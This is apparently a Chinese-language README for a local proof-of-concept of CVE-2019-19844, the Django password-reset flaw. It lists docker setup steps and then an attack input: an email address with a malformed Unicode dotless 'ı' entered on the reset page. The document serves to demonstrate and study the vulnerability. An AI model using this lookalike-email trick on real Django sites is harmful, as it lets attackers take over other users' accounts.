django_cve_2019_19844_poc
CVE-2019-19844 的概念验证(PoC) CVE-2019-19844

设置
- docker-compose run --service-ports web python manage.py migrate --no-input
- docker-compose run --service-ports web python manage.py createsuperuser --email=[email protected] --username 0xsha
- 访问 localhost:8000/accounts/password-reset
- 输入 me@0xsha.ıo 并按回车(注意 “i” 是畸形的)
- 检查控制台